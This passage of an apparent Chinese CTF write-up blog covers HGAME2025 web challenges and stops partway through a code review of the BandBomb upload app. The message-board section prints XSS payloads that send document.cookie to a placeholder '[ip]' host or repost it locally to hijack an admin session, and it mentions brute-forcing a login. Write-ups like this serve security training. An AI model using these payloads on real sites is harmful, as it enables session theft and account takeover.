<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-bounce.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous" defer></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"wanth3f1ag.top","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"atom-one-dark","dark":"atom-one-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":true,"height":500},"language":false},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>
<script>
  (function () {
    var OriginTitle = document.title;
    var titleTime;
    document.addEventListener('visibilitychange', function () {
      if (document.hidden) {
        document.title = '坏人！看完了就想走' + OriginTitle;
        clearTimeout(titleTime);
      } else {
        document.title = '(*´∇｀*)你回来啦~' + OriginTitle;
        titleTime = setTimeout(function () {
          document.title = OriginTitle;
        }, 2000);
      }
    });
  })();
</script>

    <meta name="description" content="HGAME2025">
<meta property="og:type" content="article">
<meta property="og:title" content="HGAME2025">
<meta property="og:url" content="https://wanth3f1ag.top/2025/02/22/HGAME2025/index.html">
<meta property="og:site_name" content="root@wanth3f1ag">
<meta property="og:description" content="HGAME2025">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203230941183.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203231034873.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203231123084.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203231730692.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203232701377.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250204111233858.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250207001419338.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250207001446282.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250207002012267.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222115011381.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222115238416.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222121757897.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222123722368.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020/image-20250222123531139.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222125751104.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222131347646.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222131409577.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222131429676.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222131319867.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250222131700129.png">
<meta property="article:published_time" content="2025-02-22T03:43:00.000Z">
<meta property="article:modified_time" content="2025-12-01T11:17:18.380Z">
<meta property="article:author" content="wanTh3flag">
<meta property="article:tag" content="HGAME2025">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanth3f1ag.top/image/achieve/202411/hgame2025/image-20250203230941183.png">


<link rel="canonical" href="https://wanth3f1ag.top/2025/02/22/HGAME2025/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://wanth3f1ag.top/2025/02/22/HGAME2025/","path":"2025/02/22/HGAME2025/","title":"HGAME2025"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HGAME2025 | root@wanth3f1ag</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script><script src="/js/bookmark.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>





  <script src="/js/third-party/pace.js" defer></script>


  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">root@wanth3f1ag</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">CTFer</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="s4arch" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-h0me"><a href="/" rel="section"><i class="home fa-fw"></i>H0me</a></li><li class="menu-item menu-item-a6out"><a href="/about/" rel="section"><i class="user fa-fw"></i>A6out</a></li><li class="menu-item menu-item-t6gs"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>T6gs</a></li><li class="menu-item menu-item-catagories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>Catagories</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="link fa-fw"></i>L1nks</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>s4arch
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-24-Pacman"><span class="nav-number">1.</span> <span class="nav-text">Level 24 Pacman</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%80%83%E7%9C%BC%E5%8A%9B%E7%9A%84%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="nav-number">1.1.</span> <span class="nav-text">#考眼力的签到题</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-69-MysteryMessageBoard"><span class="nav-number">2.</span> <span class="nav-text">Level 69 MysteryMessageBoard</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8D%E5%87%BA%E7%BD%91%E7%9A%84xss"><span class="nav-number">2.1.</span> <span class="nav-text">#不出网的xss</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-47-BandBomb"><span class="nav-number">3.</span> <span class="nav-text">Level 47 BandBomb</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-38475-%E8%A7%92%E8%90%BD"><span class="nav-number">4.</span> <span class="nav-text">Level 38475 角落</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#url%E9%87%8D%E5%86%99%E6%BC%8F%E6%B4%9E-ssti%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="nav-number">4.1.</span> <span class="nav-text">#url重写漏洞+ssti条件竞争</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-25-%E5%8F%8C%E9%9D%A2%E4%BA%BA%E6%B4%BE%E5%AF%B9"><span class="nav-number">5.</span> <span class="nav-text">Level 25 双面人派对</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-21096-HoneyPot"><span class="nav-number">6.</span> <span class="nav-text">Level 21096 HoneyPot</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="wanTh3flag"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">wanTh3flag</p>
  <div class="site-description" itemprop="description">一条有梦想的咸鱼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">171</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">123</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="/2323277194" title="qq → 2323277194" rel="noopener me"><i class="fab fa-qq fa-fw"></i>qq</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://wanth3f1ag.top/2025/02/22/HGAME2025/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="wanTh3flag">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="root@wanth3f1ag">
      <meta itemprop="description" content="一条有梦想的咸鱼">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="HGAME2025 | root@wanth3f1ag">
      <meta itemprop="description" content="HGAME2025">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HGAME2025
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-02-22 11:43:00" itemprop="dateCreated datePublished" datetime="2025-02-22T11:43:00+08:00">2025-02-22</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-12-01 19:17:18" itemprop="dateModified" datetime="2025-12-01T19:17:18+08:00">2025-12-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E8%B5%9B%E9%A2%98wp/" itemprop="url" rel="index"><span itemprop="name">赛题wp</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>6.6k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>6 分钟</span>
    </span>
</div>

            <div class="post-description">HGAME2025</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Level-24-Pacman"><a href="#Level-24-Pacman" class="headerlink" title="Level 24 Pacman"></a><strong>Level 24 Pacman</strong></h1><h2 id="考眼力的签到题"><a href="#考眼力的签到题" class="headerlink" title="#考眼力的签到题"></a>#考眼力的签到题</h2><p><img src="/../image/achieve/202411/hgame2025/image-20250203230941183.png" alt="image-20250203230941183"></p>
<p>一个吃豆豆的小游戏，要吃够一万分才能拿到flag，这类题都是可以去找条件然后进行绕过的，先看一下源代码</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250203231034873.png" alt="image-20250203231034873"></p>
<p>终于在源码里面看到了一句base64编码，加密后是</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250203231123084.png" alt="image-20250203231123084"></p>
<p>栅栏密码</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250203231730692.png" alt="image-20250203231730692"></p>
<p>但是这个不是密码</p>
<p>然后在又发现一个 haeu4epca_4trgm{_r_amnmse}</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250203232701377.png" alt="image-20250203232701377"></p>
<p>这个就是对的了</p>
<h1 id="Level-69-MysteryMessageBoard"><a href="#Level-69-MysteryMessageBoard" class="headerlink" title="Level 69 MysteryMessageBoard"></a>Level 69 MysteryMessageBoard</h1><h2 id="不出网的xss"><a href="#不出网的xss" class="headerlink" title="#不出网的xss"></a>#不出网的xss</h2><p>登录界面提示了shallot用户名，密码的话试了一下用字典去爆破然后就找到密码登进去了</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250204111233858.png" alt="image-20250204111233858"></p>
<p>是一个留言板，试一下xss</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>发现有弹窗显示1，说明这里可能存在xss漏洞</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;document.location.href=&quot;<span class="link">http://</span>[<span class="string">ip</span>]/xss.php?cookie=&quot;+document.cookie&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>试一下能不能拿到admin的cookie，但是拿到的只有自己的cookie，应该是需要触发admin去访问这个留言，后面扫目录看到有admin路由</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250207001419338.png" alt="image-20250207001419338"></p>
<p>应该是访问admin路由后才会触发admin访问留言</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250207001446282.png" alt="image-20250207001446282"></p>
<p>但是用上面的打法然后访问admin之后并没有收到admin的cookie，后面才知道是admin不出网，所以我们让admin去访问本地的8888端口然后把cookie反射到留言板上就可以了</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"><span class="keyword">var</span> xhr=<span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span><br><span class="line">xhr.<span class="title function_">open</span>(<span class="string">&quot;POST&quot;</span>, <span class="string">&quot;http://127.0.0.1:8888/&quot;</span>, <span class="literal">true</span>);</span><br><span class="line">xhr.<span class="title function_">setRequestHeader</span>(<span class="string">&quot;Content-Type&quot;</span>,<span class="string">&quot;application/x-www-form-urlencoded&quot;</span>);</span><br><span class="line">xhr.<span class="title function_">send</span>(<span class="string">&quot;comment=&quot;</span> + <span class="variable language_">document</span>.<span class="property">cookie</span>);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>传入后访问admin路由触发admin访问留言，然后刷新页面就可以拿到admin的cookie了</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250207002012267.png" alt="image-20250207002012267"></p>
<p>后面访问flag路由然后伪造admin身份就可以拿到flag了</p>
<h1 id="Level-47-BandBomb"><a href="#Level-47-BandBomb" class="headerlink" title="Level 47 BandBomb"></a><strong><strong>Level 47 BandBomb</strong></strong></h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//app.js</span></span><br><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> multer = <span class="built_in">require</span>(<span class="string">&#x27;multer&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> path = <span class="built_in">require</span>(<span class="string">&#x27;path&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">set</span>(<span class="string">&#x27;view engine&#x27;</span>, <span class="string">&#x27;ejs&#x27;</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(<span class="string">&#x27;/static&#x27;</span>, express.<span class="title function_">static</span>(path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;public&#x27;</span>)));</span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">json</span>());</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> storage = multer.<span class="title function_">diskStorage</span>(&#123;</span><br><span class="line">  <span class="attr">destination</span>: <span class="function">(<span class="params">req, file, cb</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> uploadDir = <span class="string">&#x27;uploads&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span> (!fs.<span class="title function_">existsSync</span>(uploadDir)) &#123;</span><br><span class="line">      fs.<span class="title function_">mkdirSync</span>(uploadDir);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_">cb</span>(<span class="literal">null</span>, uploadDir);</span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="attr">filename</span>: <span class="function">(<span class="params">req, file, cb</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="title function_">cb</span>(<span class="literal">null</span>, file.<span class="property">originalname</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> upload = <span class="title function_">multer</span>(&#123; </span><br><span class="line">  <span class="attr">storage</span>: storage,</span><br><span class="line">  <span class="attr">fileFilter</span>: <span class="function">(<span class="params">_, file, cb</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      <span class="keyword">if</span> (!file.<span class="property">originalname</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_">cb</span>(<span class="keyword">new</span> <span class="title class_">Error</span>(<span class="string">&#x27;无效的文件名&#x27;</span>), <span class="literal">false</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="title function_">cb</span>(<span class="literal">null</span>, <span class="literal">true</span>);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (err) &#123;</span><br><span class="line">      <span class="title function_">cb</span>(<span class="keyword">new</span> <span class="title class_">Error</span>(<span class="string">&#x27;文件处理错误&#x27;</span>), <span class="literal">false</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;/&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> uploadsDir = path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;uploads&#x27;</span>);</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">if</span> (!fs.<span class="title function_">existsSync</span>(uploadsDir)) &#123;</span><br><span class="line">    fs.<span class="title function_">mkdirSync</span>(uploadsDir);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fs.<span class="title function_">readdir</span>(uploadsDir, <span class="function">(<span class="params">err, files</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (err) &#123;</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">500</span>).<span class="title function_">render</span>(<span class="string">&#x27;mortis&#x27;</span>, &#123; <span class="attr">files</span>: [] &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    res.<span class="title function_">render</span>(<span class="string">&#x27;mortis&#x27;</span>, &#123; <span class="attr">files</span>: files &#125;);</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&#x27;/upload&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  upload.<span class="title function_">single</span>(<span class="string">&#x27;file&#x27;</span>)(req, res, <span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (err) &#123;</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123; <span class="attr">error</span>: err.<span class="property">message</span> &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!req.<span class="property">file</span>) &#123;</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123; <span class="attr">error</span>: <span class="string">&#x27;没有选择文件&#x27;</span> &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    res.<span class="title function_">json</span>(&#123; </span><br><span class="line">      <span class="attr">message</span>: <span class="string">&#x27;文件上传成功&#x27;</span>,</span><br><span class="line">      <span class="attr">filename</span>: req.<span class="property">file</span>.<span class="property">filename</span> </span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&#x27;/rename&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> &#123; oldName, newName &#125; = req.<span class="property">body</span>;</span><br><span class="line">  <span class="keyword">const</span> oldPath = path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;uploads&#x27;</span>, oldName);</span><br><span class="line">  <span class="keyword">const</span> newPath = path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;uploads&#x27;</span>, newName);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!oldName || !newName) &#123;</span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123; <span class="attr">error</span>: <span class="string">&#x27; &#x27;</span> &#125;);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fs.<span class="title function_">rename</span>(oldPath, newPath, <span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (err) &#123;</span><br><span class="line">      <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">500</span>).<span class="title function_">json</span>(&#123; <span class="attr">error</span>: <span class="string">&#x27; &#x27;</span> + err.<span class="property">message</span> &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    res.<span class="title function_">json</span>(&#123; <span class="attr">message</span>: <span class="string">&#x27; &#x27;</span> &#125;);</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(port, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`服务器运行在 http://localhost:<span class="subst">$&#123;port&#125;</span>`</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>先进行代码审计</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.use(<span class="string">&#x27;/static&#x27;</span>, express.<span class="keyword">static</span>(path.<span class="keyword">join</span>(__dirname, <span class="string">&#x27;public&#x27;</span>)));</span><br></pre></td></tr></table></figure>

<ul>
<li><code>app.use()</code> 是 Express 应用程序的方法，用于将中间件函数附加到应用程序的请求处理流程中。它可以用于处理所有 HTTP 请求类型</li>
<li>**<code>&#39;/static</code>**指定了当客户端请求以 <code>/static</code> 开头的路径时，后续的中间件（在这里是 <code>express.static</code>）将会处理这些请求。</li>
